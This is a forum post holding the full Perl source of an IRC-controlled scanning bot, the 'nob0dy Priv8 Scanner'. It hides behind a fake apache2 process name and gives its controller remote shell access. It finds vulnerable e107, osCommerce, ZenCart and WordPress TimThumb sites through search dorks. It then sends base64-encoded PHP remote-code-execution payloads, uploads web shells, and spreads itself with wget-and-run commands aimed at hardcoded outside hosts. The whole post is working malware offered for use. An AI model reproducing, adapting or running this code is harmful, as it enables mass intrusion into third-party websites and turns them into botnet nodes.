13 Years of Service
24%
# nob0dy Priv8 Scanner MODIFIED BY MRC# Coded by BL4DE
Code:
>#!/usr/bin/perl# nob0dy Priv8 Scanner MODIFIED BY MRC# Coded by BL4DE# How to use:# ask your momuse HTTP::Request;use LWP::UserAgent;use IO::Socket;use IO::Select;use Socket;use MIME::Base64;use File::Basename;my $datetime = localtime;my $fakeproc = "/usr/sbin/apache2 [thumb]";my $ircserver = "200.98.64.222";my $ircport = "6667";my $nickname = "lol-{".int(rand(100))."}";my $ident = "WordPress";my $channel = "#scan";my $admin = "donk";my $fullname = "IOdidi";my $nob0dy = "15(7@2nob0dy15)";my $osclogo = "15(7@2osCommerce15)";my $e107logo = "15(7@2e10715)";my $zenlogo = "15(7@2ZenCart15)";my $timlogo = "14(1@3Scan(WP)14)";;my $osccmd = '!!!osco';my $e107cmd = '!e107';my $zencmd = '!zen';my $timcmd = '!thumb2';my $injector = "http://www.smpn6.dindikptk.net/materi/upload.php"; # r57 injector my $osc_shell = "upload.php"; # uploadermy $osc_bot = "http://chateaudefere.com/blog/wp-includes/Text/emo.txt"; # bot perl my $botshell = "http://chateaudefere.com/blog/wp-includes/Text/tum.txt";# botperlmy $timshell = "http://blogger.com.chapa.in/sh.php"; # uploader for timthumbmy $uagent = 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6';$SIG{'INT'} = 'IGNORE';$SIG{'HUP'} = 'IGNORE';$SIG{'TERM'} = 'IGNORE';$SIG{'CHLD'} = 'IGNORE';$SIG{'PS'} = 'IGNORE';#chdir("/");$ircserver = "$ARGV[0]" if $ARGV[0];$0 = "$fakeproc"."\0" x 16;my $pid = fork;exit if $pid;die "\n[!] Something Wrong !!!: $!\n\n" unless defined($pid);our %irc_servers;our %DCC;my $dcc_sel = new IO::Select->new();$sel_client = IO::Select->new();sub sendraw { if ($#_ == '1') { my $socket = $_[0]; print $socket "$_[1]\n"; } else { print $IRC_cur_socket "$_[0]\n"; }}sub connector { my $mynick = $_[0]; my $ircserver_con = $_[1]; my $ircport_con = $_[2]; my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$ircserver_con", PeerPort=>$ircport_con) or return(1); if (defined($IRC_socket)) { $IRC_cur_socket = $IRC_socket; $IRC_socket->autoflush(1); $sel_client->add($IRC_socket); $irc_servers{$IRC_cur_socket}{'host'} = "$ircserver_con"; $irc_servers{$IRC_cur_socket}{'port'} = "$ircport_con"; $irc_servers{$IRC_cur_socket}{'nick'} = $mynick; $irc_servers{$IRC_cur_socket}{'myip'} = $IRC_socket->sockhost; nick("$mynick"); sendraw("USER $ident ".$IRC_socket->sockhost." $ircserver_con :$fullname"); sleep 1; }}sub parse { my $servarg = shift; if ($servarg =~ /^PING \:(.*)/) { sendraw("PONG :$1"); } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) { if (lc($1) eq lc($mynick)) { $mynick = $4; $irc_servers{$IRC_cur_socket}{'nick'} = $mynick; } } elsif ($servarg =~ m/^\:(.+?)\s+433/i) { nick("$mynick".int rand(999)); } elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) { $mynick = $2; $irc_servers{$IRC_cur_socket}{'nick'} = $mynick; $irc_servers{$IRC_cur_socket}{'nome'} = "$1"; sendraw("MODE $mynick +Bx"); sendraw("JOIN $channel"); sleep(1); sendraw("PRIVMSG $channel :Timthumb Bot R3cod3d By MRC"); sendraw("PRIVMSG $admin :Hi $admin im here !!!"); }}my $line_temp;while( 1 ) { while (!(keys(%irc_servers))) { connector("$nickname", "$ircserver", "$ircport"); } delete($irc_servers{''}) if (defined($irc_servers{''})); my @ready = $sel_client->can_read(0); next unless(@ready); foreach $fh (@ready) { $IRC_cur_socket = $fh; $mynick = $irc_servers{$IRC_cur_socket}{'nick'}; $nread = sysread($fh, $ircmsg, 4096); if ($nread == 0) { $sel_client->remove($fh); $fh->close; delete($irc_servers{$fh}); } @lines = split (/\n/, $ircmsg); $ircmsg =~ s/\r\n$//; if ($ircmsg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) { my ($nick,$ident,$host,$path,$msg) = ($1,$2,$3,$4,$5); if ($path eq $mynick) { if ($msg =~ /^PING (.*)/) { sendraw("NOTICE $nick :PING $1"); } if ($msg =~ /^VERSION/) { sendraw("NOTICE $nick :VERSION mIRC v6.21 Khaled Mardam-Bey"); } if ($msg =~ /^TIME/) { sendraw("NOTICE $nick :TIME ".$datetime.""); } if (&isAdmin($nick) && $msg eq "!die") { &shell("$path","kill -9 $$"); } if (&isAdmin($nick) && $msg eq "!killall") { &shell("$path","kill -9 $$"); } if (&isAdmin($nick) && $msg eq "!reset") { sendraw("QUIT :Reiniciando..."); } if (&isAdmin($nick) && $msg =~ /^!join \#(.+)/) { sendraw("JOIN #".$1); } if (&isAdmin($nick) && $msg =~ /^!part \#(.+)/) { sendraw("PART #".$1); } if (&isAdmin($nick) && $msg =~ /^!nick (.+)/) { sendraw("NICK ".$1); } if (&isAdmin($nick) && $msg =~ /^!pid/) { sendraw($IRC_cur_socket, "PRIVMSG $nick :Fake Process/PID : $fakeproc - $$"); } if (&isAdmin($nick) && $msg !~ /^!/) { &shell("$nick","$msg"); } } else { if (&isAdmin($nick) && $msg eq "!die") { &shell("$path","kill -9 $$"); } if (&isAdmin($nick) && $msg eq "!killall") { &shell("$path","kill -9 $$"); } if (&isAdmin($nick) && $msg eq "!reset") { sendraw("QUIT :Reiniciando..."); } if (&isAdmin($nick) && $msg =~ /^!join \#(.+)/) { sendraw("JOIN #".$1); } if (&isAdmin($nick) && $msg eq "!part") { sendraw("PART $path"); } if (&isAdmin($nick) && $msg =~ /^!part \#(.+)/) { sendraw("PART #".$1); } if (&isAdmin($nick) && $msg =~ /^\.x (.*)/) { &shell("$path","$1"); } if (&isAdmin($nick) && $msg =~ /^$mynick (.*)/) { &shell("$path","$1"); } ##################################################################### HELP COMMAND if ($msg=~ /^!help/) { my $helplogo = "15(7@2Help15)"; &notice("$nick","$helplogo 12e107 contact.php Vuln Scan:6 $e107cmd [bug] [dork]"); &notice("$nick","$helplogo 12OsCommerce Remote Upload Vuln Scan:6 $osccmd [dork]"); &notice("$nick","$helplogo 12ZenCart Remote Upload Vuln Scan:6 $zencmd [dork]"); &notice("$nick","$helplogo 12WP TimThumb Plugin RCE Scan:6 $timcmd [bug] [dork]"); &notice("$nick","$helplogo 05,01Source Code Modified by 04MRC and BL4DE"); } if ($msg=~ /^!response/ || $msg=~ /^!id/) { if (&isFound($injector,"FJ3XiuRZulJfcu7mB13")) { &notice("$nick","15(7@2Injector15)6 PHP Shell is 3UP"); } else { &notice("$nick","15(7@2Injector15)6 PHP Shell is 4Down"); } } if (&isAdmin($nick) && $msg =~ /^!pid/) { &notice("$nick","6Fake Process/PID : $fakeproc - $$"); } ##################################################################### e107 contact.php SCAN if ($msg=~ /^$e107cmd\s+(.+?)\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { if (&isFound($injector,"FJ3XiuRZulJfcu7mB13")) { my ($bug,$dork) = ($1,$2); &msg("$path","$e107logo 12Dork :4 $dork"); &msg("$path","$e107logo 12Bugz :4 $bug"); &msg("$path","$e107logo 6Search Engine Loading ..."); &e107_start($path,$bug,$dork,"GooGLe,AllTheWeb,Bing,bing_uk,AsK,UoL,YahOo"); } else { &msg("$path","[ $nick ] $e107logo 4PHP Shell is Down!"); } } exit; } } ##################################################################### osCommerce R-Upload Vuln SCAN if ($msg=~ /^$osccmd\s+(.+)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { if (-e ($osc_shell)) { my $dork = $1; &msg("$path","$osclogo 12Dork :4 $dork"); &msg("$path","$osclogo 6Search Engine Loading ..."); &osc_start($path,$dork,"GooGLe,AllTheWeb,Bing,ALtaViSTa,AsK,UoL,YahOo"); } else { &msg("$path","[ $nick ] $osclogo 4Local PHP Shell not Found!"); } } exit; } } ##################################################################### ZenCart R-Upload Vuln SCAN if ($msg=~ /^$zencmd\s+(.+)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { if (-e ($osc_shell)) { my $dork = $1; &msg("$path","$zenlogo 12Dork :4 $dork"); &msg("$path","$zenlogo 6Search Engine Loading ..."); &zen_start($path,$dork,"GooGLe,AllTheWeb,Bing,ALtaViSTa,AsK,UoL,YahOo"); } else { &msg("$path","[ $nick ] $zenlogo 4Local PHP Shell not Found!"); } } exit; } } ##################################################################### WP TimThumb SCAN if ($msg=~ /^$timcmd\s+(.+?)\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { if (&isFound($timshell,"pZJda8IwFIbvB")) { my ($bug,$dork) = ($1,$2); &msg("$path","$timlogo 2Dork :3 $dork"); &msg("$path","$timlogo 3Bug :2 $bug"); &msg("$path","$timlogo 15Scanner iniciado.. Engines Em Carregamento ..."); &timthumb_start($path,$bug,$dork,"GooGLe,AllTheWeb,Bing,bing_uk,AsK,UoL,YahOo"); } else { &msg("$path","[ $nick ] $timlogo 4TimThumb Uploader Esta Fora Do Ar!"); } } exit; } } ##################################################################### } } for(my $c=0; $c 0) { foreach my $site (@list) { $count++; if ($count == $num-1) { &msg("$chan","$e107logo(7@2$engine15)10 Scan finish for14 $dork"); } my $test = "http://".$site.$bug; my $code = "ZWNobyAidjBwQ3Izdzxicj4iOw0KZWNobyAic3lzOiIucGhwX3VuYW1lKCkuIjxicj4iOw0KJGNtZD0iZWNobyBub2IwZHlDcjN3IjsNCiRlc2VndWljbWQ9ZXgoJGNtZCk7DQplY2hvICRlc2VndWljbWQ7DQpmdW5jdGlvbiBleCgkY2ZlKXsNCiRyZXMgPSAnJzsNCmlmICghZW1wdHkoJGNmZSkpew0KaWYoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpew0KQGV4ZWMoJGNmZSwkcmVzKTsNCiRyZXMgPSBqb2luKCJcbiIsJHJlcyk7DQp9DQplbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdzaGVsbF9leGVjJykpew0KJHJlcyA9IEBzaGVsbF9leGVjKCRjZmUpOw0KfQ0KZWxzZWlmKGZ1bmN0aW9uX2V4aXN0cygnc3lzdGVtJykpew0KQG9iX3N0YXJ0KCk7DQpAc3lzdGVtKCRjZmUpOw0KJHJlcyA9IEBvYl9nZXRfY29udGVudHMoKTsNCkBvYl9lbmRfY2xlYW4oKTsNCn0NCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3Bhc3N0aHJ1Jykpew0KQG9iX3N0YXJ0KCk7DQpAcGFzc3RocnUoJGNmZSk7DQokcmVzID0gQG9iX2dldF9jb250ZW50cygpOw0KQG9iX2VuZF9jbGVhbigpOw0KfQ0KZWxzZWlmKEBpc19yZXNvdXJjZSgkZiA9IEBwb3BlbigkY2ZlLCJyIikpKXsNCiRyZXMgPSAiIjsNCndoaWxlKCFAZmVvZigkZikpIHsgJHJlcyAuPSBAZnJlYWQoJGYsMTAyNCk7IH0NCkBwY2xvc2UoJGYpOw0KfX0NCnJldHVybiAkcmVzOw0KfQ=="; my $html = e107_rce_query($test,$code); if ($html =~ /v0pCr3w
sys:(.+?)
nob0dyCr3w/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $sys = $1; my $upload = 'if(@copy("'.$injector.'","hellcome.php")) { echo "c0liSUKSESc0li"; }'; my $res = e107_rce_query($test,encode_base64($upload)); if ($res =~ /c0liSUKSESc0li/) { &msg("$chan","$e107logo(7@2$engine15)15(13@12e107-SheLL15)10 http://".$site."12hellcome.php 15(7@3".$sys."15)(7@12safemode-off15)"); sleep(5); } else { &msg("$chan","$e107logo(7@2$engine15)15(13@12Vuln15)10 ".$test." 15(7@3".$sys."15)(7@12safemode-off15)"); sleep(5); } &e107_spread_query($test); sleep(2); } exit; } sleep(5); } elsif ($html =~ /v0pCr3w
sys:(.+?)
/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $sys = $1; my $upload = 'if(@copy("'.$injector.'","hellcome.php")) { echo "c0liSUKSESc0li"; }'; my $res = e107_rce_query($test,encode_base64($upload)); if ($res =~ /c0liSUKSESc0li/) { &msg("$chan","$e107logo(7@2$engine15)15(13@12e107-SheLL15)10 http://".$site."12hellcome.php 15(7@3".$sys."15)(7@4safemode-on15)"); sleep(5); } else { &msg("$chan","$e107logo(7@2$engine15)15(13@12Vuln15)10 ".$test." 15(7@3".$sys."15)(7@4safemode-on15)"); sleep(5); } } exit; } sleep(5); } } }}sub osc() { my $chan = $_[0]; my $dork = $_[1]; my $engine = $_[2]; my $count = 0; my @list = search_engine($chan,$dork,$engine,$osclogo); my $num = scalar(@list); if ($num > 0) { foreach my $site (@list) { $count++; if ($count == $num-1) { &msg("$chan","$osclogo(7@2$engine15)10 Scan finish for14 $dork"); } my $test = "http://".$site.'admin/categories.php/login.php?cPath=&action=new_product_preview'; my $html = osc_upl_query($test); if ($html =~ /File upload saved successfully/ || $html =~ /sys:(.+?)
/) { my $sys = $1; &msg("$chan","$osclogo(7@2$engine15)15(13@12Uploader15)10 http://".$site."images/12hellc0me.php 15(7@3".$sys."15)(7@4safemode-on15)"); sleep(5); } else { &msg("$chan","$osclogo(7@2$engine15)15(13@12Uploader15)10 http://".$site."images/12hellc0me.php"); } sleep(2); } exit; } sleep(5); } } }}sub zen() { my $chan = $_[0]; my $dork = $_[1]; my $engine = $_[2]; my $count = 0; my @list = search_engine($chan,$dork,$engine,$zenlogo); my $num = scalar(@list); if ($num > 0) { foreach my $site (@list) { $count++; if ($count == $num-1) { &msg("$chan","$zenlogo(7@2$engine15)10 Scan finish for14 $dork"); } my $test = "http://".$site.'admin/product.php/password_forgotten.php?action=new_product_preview'; my $html = zen_upl_query($test); if ($html =~ /sys:(.+?)
/) { my $sys = $1; &msg("$chan","$zenlogo(7@2$engine15)15(13@12Uploader15)10 http://".$site."images/12hellc0me.php 15(7@3".$sys."15)(7@4safemode-on15)"); sleep(5); } else { &msg("$chan","$zenlogo(7@2$engine15)15(13@12Uploader15)10 http://".$site."images/12hellc0me.php"); } sleep(2); } exit; } sleep(5); } } }}sub timthumb() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $count = 0; my @list = search_engine($chan,$dork,$engine,$timlogo); my $num = scalar(@list); if ($num > 0) { foreach my $site (@list) { $count++; if ($count == $num-1) { &msg("$chan","$timlogo(7@2$engine15)10 Scan finish for14 $dork"); } my $path = dirname($bug)."/"; my $xpl = "http://".$site.$bug."?src=".$timshell; my $vuln1 = "http://".$site."12".$path."6cache/external_ec34fc789497f5e01c396398ed7d7a43.php"; my $vuln2 = "http://".$site."12".$path."6cache/ec34fc789497f5e01c396398ed7d7a43.php"; my $vuln3 = "http://".$site."12".$path."6temp/external_ec34fc789497f5e01c396398ed7d7a43.php"; my $vuln4 = "http://".$site."12".$path."6temp/ec34fc789497f5e01c396398ed7d7a43.php"; my $html = get_content($xpl); if ($html =~ /cache\/external_ec34fc789497f5e01c396398ed7d7a43.php/ && $html !~ /can not be created/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $check = get_content("http://".$site.$path."cache/external_ec34fc789497f5e01c396398ed7d7a43.php?lol"); if ($check =~ /v0pCr3w
sys:(.+?)
nob0dyCr3w/) { my $sys = $1; &msg("$chan","$timlogo(7@2$engine15)15(13@12Uploader15)4 ".$vuln1." 15(7@3".$sys."15)(7@12safemode-off15)"); &msg("$admin","$timlogo(7@2$engine15)15(13@12Uploader15)4 ".$vuln1." 15(7@3".$sys."15)(7@12safemode-off15)"); sleep(3); my $botchan = $channel; $botchan =~ s/\#//; my $spread_cmd = "wget $botshell;perl tum.txt ; rm -rf tum* "; my $spread = get_content("http://".$site.$path."cache/external_ec34fc789497f5e01c396398ed7d7a43.php?osc=".encode_base64($spread_cmd)); $spread = ""; } elsif ($check =~ /v0pCr3w
sys:(.+?)
/) { my $sys = $1; &msg("$chan","$timlogo(7@2$engine15)15(13@12Uploader15)4 ".$vuln1." 15(7@3".$sys."15)(7@4safemode-on15)"); &msg("$admin","$timlogo(7@2$engine15)15(13@12Uploader15)4 ".$vuln1." 15(7@3".$sys."15)(7@4safemode-on15)"); sleep(3); } else { &msg("$chan","$timlogo(7@2$engine15)15(13@12TimThumb15)14 ".$vuln1); &msg("$admin","$timlogo(7@2$engine15)15(13@12TimThumb15)14 ".$vuln1); } } exit; } sleep(3); } elsif ($html =~ /cache\/ec34fc789497f5e01c396398ed7d7a43.php/ && $html !~ /can not be created/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $check = get_content("http://".$site.$path."cache/ec34fc789497f5e01c396398ed7d7a43.php?lol"); if ($check =~ /v0pCr3w
sys:(.+?)
nob0dyCr3w/) { my $sys = $1; &msg("$chan","$timlogo(7@2$engine15)15(13@12Uploader15)4 ".$vuln2." 15(7@3".$sys."15)(7@12safemode-off15)"); &msg("$admin","$timlogo(7@2$engine15)15(13@12Uploader15)4 ".$vuln2." 15(7@3".$sys."15)(7@12safemode-off15)"); sleep(3); my $botchan = $channel; $botchan =~ s/\#//; my $spread_cmd = "wget $botshell ;perl emo.txt; rm -rf tum* "; my $spread = get_content("http://".$site.$path."cache/ec34fc789497f5e01c396398ed7d7a43.php?osc=".encode_base64($spread_cmd)); $spread = ""; } elsif ($check =~ /v0pCr3w
sys:(.+?)
/) { my $sys = $1; &msg("$chan","$timlogo(7@2$engine15)15(13@12Uploader15)4 ".$vuln2." 15(7@3".$sys."15)(7@4safemode-on15)"); &msg("$admin","$timlogo(7@2$engine15)15(13@12Uploader15)4 ".$vuln2." 15(7@3".$sys."15)(7@4safemode-on15)"); sleep(3); } else { &msg("$chan","$timlogo(7@2$engine15)15(13@12TimThumb15)3 ".$vuln2); &msg("$admin","$timlogo(7@2$engine15)15(13@12TimThumb15)14 ".$vuln2); } } exit; } sleep(3); } elsif ($html =~ /temp\/external_ec34fc789497f5e01c396398ed7d7a43.php/ && $html !~ /can not be created/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $check = get_content("http://".$site.$path."temp/external_ec34fc789497f5e01c396398ed7d7a43.php?lol"); if ($check =~ /v0pCr3w
sys:(.+?)
nob0dyCr3w/) { my $sys = $1; &msg("$chan","$timlogo(7@2$engine15)15(13@12Uploader15)4 ".$vuln3." 15(7@3".$sys."15)(7@12safemode-off15)"); &msg("$admin","$timlogo(7@2$engine15)15(13@12Uploader15)4 ".$vuln3." 15(7@3".$sys."15)(7@12safemode-off15)"); sleep(3); my $botchan = $channel; $botchan =~ s/\#//; my $spread_cmd = "wget $botshell ;perl tum.txt; rm -rf tum* "; my $spread = get_content("http://".$site.$path."temp/external_ec34fc789497f5e01c396398ed7d7a43.php?osc=".encode_base64($spread_cmd)); $spread = ""; } elsif ($check =~ /v0pCr3w
sys:(.+?)
/) { my $sys = $1; &msg("$chan","$timlogo(7@2$engine15)15(13@12Uploader15)4 ".$vuln3." 15(7@3".$sys."15)(7@4safemode-on15)"); &msg("$admin","$timlogo(7@2$engine15)15(13@12Uploader15)4 ".$vuln3." 15(7@3".$sys."15)(7@4safemode-on15)"); sleep(3); } else { &msg("$chan","$timlogo(7@2$engine15)15(13@12TimThumb15)3 ".$vuln3); &msg("$admin","$timlogo(7@2$engine15)15(13@12TimThumb15)14 ".$vuln3); } } exit; } sleep(3); } elsif ($html =~ /temp\/ec34fc789497f5e01c396398ed7d7a43.php/ && $html !~ /can not be created/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $check = get_content("http://".$site.$path."temp/ec34fc789497f5e01c396398ed7d7a43.php?lol"); if ($check =~ /v0pCr3w
sys:(.+?)
nob0dyCr3w/) { my $sys = $1; &msg("$chan","$timlogo(7@2$engine15)15(13@12Uploader15)4 ".$vuln4." 15(7@3".$sys."15)(7@12safemode-off15)"); &msg("$admin","$timlogo(7@2$engine15)15(13@12Uploader15)4 ".$vuln4." 15(7@3".$sys."15)(7@12safemode-off15)"); sleep(3); my $botchan = $channel; $botchan =~ s/\#//; my $spread_cmd = "wget $botshell ;perl emo.txt; rm -rf tum* "; my $spread = get_content("http://".$site.$path."temp/ec34fc789497f5e01c396398ed7d7a43.php?osc=".encode_base64($spread_cmd)); $spread = ""; } elsif ($check =~ /v0pCr3w
sys:(.+?)
/) { my $sys = $1; &msg("$chan","$timlogo(7@2$engine15)15(13@12Uploader15)4 ".$vuln4." 15(7@3".$sys."15)(7@4safemode-on15)"); &msg("$admin","$timlogo(7@2$engine15)15(13@12Uploader15)4 ".$vuln4." 15(7@3".$sys."15)(7@4safemode-on15)"); sleep(3); } else { &msg("$chan","$timlogo(7@2$engine15)15(13@12TimThumb15)3 ".$vuln4); &msg("$admin","$timlogo(7@2$engine15)15(13@12TimThumb15)14 ".$vuln4); } } exit; } sleep(3); } } }}#########################################sub search_engine() { my (@total,@clean); my $chan = $_[0]; my $dork = $_[1]; my $engine = $_[2]; my $logo = $_[3]; if ($engine eq "GooGLe") { my @google = google($dork); push(@total,@google); } if ($engine eq "AllTheWeb") { my @alltheweb = alltheweb($dork); push(@total,@alltheweb); } if ($engine eq "Bing") { my @bing = bing($dork); push(@total,@bing); } if ($engine eq "ALtaViSTa") { my @altavista = altavista($dork); push(@total,@altavista); } if ($engine eq "AsK") { my @ask = ask($dork); push(@total,@ask); } if ($engine eq "UoL") { my @uol = uol($dork); push(@total,@uol); } if ($engine eq "YahOo") { my @yahoo = yahoo($dork); push(@total,@yahoo); } @clean = clean(@total); &msg("$chan","$logo(7@2$engine15)12 Total:4 (".scalar(@total).")12 Clean:4 (".scalar(@clean).")"); return @clean;}#########################################sub isFound() { my $status = 0; my $link = $_[0]; my $reqexp = $_[1]; my $res = get_content($link); if ($res =~ /$reqexp/) { $status = 1 } return $status;}sub get_content() { my $url = $_[0]; my $ua = LWP::UserAgent->new(agent => $uagent); $ua->timeout(10); my $req = HTTP::Request->new(GET => $url); my $res = $ua->request($req); return $res->content;}sub e107_rce_query() { my $url = $_[0]; my $code = $_[1]; my $req = HTTP::Request->new(POST => $url); $req->content_type('application/x-www-form-urlencoded'); $req->content("send-contactus=1&author_name=[php]eval(base64_decode('".$code."'));die;[/php]
"); my $ua = LWP::UserAgent->new(agent => $uagent); $ua->timeout(10); my $res = $ua->request($req); return $res->content;}sub e107_spread_query() { my $url = $_[0]; my $code = "ICRjbWQ9ImNkIC90bXA7d2dldCBodHRwOi8vaGljaGljZmFzaGlvbi5jb20vaW1hZ2VzL2Zhc2hpb25zLmpwZztwZXJsIGZhc2hpb25zLmpwZyBpcmMubm9iMGR5Lm5ldCA1NDMyMSBlMTA3IGUxMDcgc2NhbiBhbmRlciAvdXNyL2Jpbi9waHAiOw0KJGVzZWd1aWNtZD1leCgkY21kKTsNCmVjaG8gJGVzZWd1aWNtZDsNCmZ1bmN0aW9uIGV4KCRjZmUpew0KJHJlcyA9ICcnOw0KaWYgKCFlbXB0eSgkY2ZlKSl7DQppZihmdW5jdGlvbl9leGlzdHMoJ2V4ZWMnKSl7DQpAZXhlYygkY2ZlLCRyZXMpOw0KJHJlcyA9IGpvaW4oIlxuIiwkcmVzKTsNCn0NCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3NoZWxsX2V4ZWMnKSl7DQokcmVzID0gQHNoZWxsX2V4ZWMoJGNmZSk7DQp9DQplbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdzeXN0ZW0nKSl7DQpAb2Jfc3RhcnQoKTsNCkBzeXN0ZW0oJGNmZSk7DQokcmVzID0gQG9iX2dldF9jb250ZW50cygpOw0KQG9iX2VuZF9jbGVhbigpOw0KfQ0KZWxzZWlmKGZ1bmN0aW9uX2V4aXN0cygncGFzc3RocnUnKSl7DQpAb2Jfc3RhcnQoKTsNCkBwYXNzdGhydSgkY2ZlKTsNCiRyZXMgPSBAb2JfZ2V0X2NvbnRlbnRzKCk7DQpAb2JfZW5kX2NsZWFuKCk7DQp9DQplbHNlaWYoQGlzX3Jlc291cmNlKCRmID0gQHBvcGVuKCRjZmUsInIiKSkpew0KJHJlcyA9ICIiOw0Kd2hpbGUoIUBmZW9mKCRmKSkgeyAkcmVzIC49IEBmcmVhZCgkZiwxMDI0KTsgfQ0KQHBjbG9zZSgkZik7DQp9fQ0KcmV0dXJuICRyZXM7DQp9IA=="; my $req = HTTP::Request->new(POST => $url); $req->content_type('application/x-www-form-urlencoded'); $req->content("send-contactus=1&author_name=[php]eval(base64_decode('".$code."'));die;[/php]
"); my $ua = LWP::UserAgent->new(agent => $uagent); $ua->timeout(10); my $res = $ua->request($req);}sub osc_upl_query() { my $url = $_[0]; my $ua = LWP::UserAgent->new(agent => $uagent); $ua->timeout(20); my $req = $ua->post($url, Content_Type=>'form-data', Content=>["products_image"=>["$osc_shell"]]); return $req->content;}sub osc_uplbot_query() { my $url = $_[0]; my $ua = LWP::UserAgent->new(agent => $uagent); $ua->timeout(20); my $req = $ua->post($url, Content_Type=>'form-data', Content=>["products_image"=>["$osc_bot"]]); return $req->content;}sub zen_upl_query() { my $url = $_[0]; my $ua = LWP::UserAgent->new(agent => $uagent); $ua->timeout(20); my $req = $ua->post($url, Content_Type=>'multipart/form-data', Content=>["products_image"=>["$osc_shell"]]); return $req->content;}sub zen_uplbot_query() { my $url = $_[0]; my $ua = LWP::UserAgent->new(agent => $uagent); $ua->timeout(20); my $req = $ua->post($url, Content_Type=>'multipart/form-data', Content=>["products_image"=>["$osc_bot"]]); return $req->content;}######################################### SEARCH ENGINEsub google() { my @list; my $key = $_[0]; for (my $i=0; $i\"]*)\//g) { my $link = $1; if ($link !~ /google/){ my @grep = links($link); push(@list,@grep); } } } return @list;}sub alltheweb() { my @list; my $key = $_[0]; for (my $i=0; $i/g) { my $link = $1; if ($link !~ /bingj|yahoo/) { $link =~ s/ //g; $link =~ s/%3f/\?/g; my @grep = links($link); push(@list,@grep); } } } return @list;}sub uol() { my @list; my $key = $_[0]; for (my $i=1; $i\"]*)/g) { my $link = $1; if ($link !~ /busca|uol|yahoo/) { my @grep = links($link); push(@list,@grep); } } } return @list;}sub bing() { my @list; my $key = $_[0]; for (my $i=1; $i\"]*)\//g) { my $link = $1; if ($link !~ /msn|live|bing/) { my @grep = links($link); push(@list,@grep); } } } return @list;}sub altavista() { my @list; my $key = $_[0]; for (my $i=1; $i(.+?)\//g) { my $link = $1; if ($link !~ /altavista/){ $link =~ s//g; $link =~ s/ //g; my @grep = links($link); push(@list,@grep); } } } return @list;}sub ask() { my @list; my $key = $_[0]; for (my $i=0; $inew(PeerAddr=>"$host", PeerPort=>"80", Proto=>"tcp") or return; print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: $uagent\r\n\r\n"; my @pages = ; $page = "@pages"; close($sock); }; return $page;}#########################################sub shell() { my $path = $_[0]; my $cmd = $_[1]; if ($cmd =~ /cd (.*)/) { chdir("$1") || &msg("$path","No such file or directory"); return; } elsif ($pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my @output = `$cmd 2>&1 3>&1`; my $c = 0; foreach my $output (@output) { $c++; chop $output; &msg("$path","$output"); if ($c == 5) { $c = 0; sleep 3; } } exit; }}}sub isAdmin() { my $status = 0; my $nick = $_[0]; if ($nick eq $admin) { $status = 1; } return $status;}sub msg() { return unless $#_ == 1; sendraw($IRC_cur_socket, "PRIVMSG $_[0] :$_[1]");}sub nick() { return unless $#_ == 0; sendraw("NICK $_[0]");}sub notice() { return unless $#_ == 1; sendraw("NOTICE $_[0] :$_[1]");}